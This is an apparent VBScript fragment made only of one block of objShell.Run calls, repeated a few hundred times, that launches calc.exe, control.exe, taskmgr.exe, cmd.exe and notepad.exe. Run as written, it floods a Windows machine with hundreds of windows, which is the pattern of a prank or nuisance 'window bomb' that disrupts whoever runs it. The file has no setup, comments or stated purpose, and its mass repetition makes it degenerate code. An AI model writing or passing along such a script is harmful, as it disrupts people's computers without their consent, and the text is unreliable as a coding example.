objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
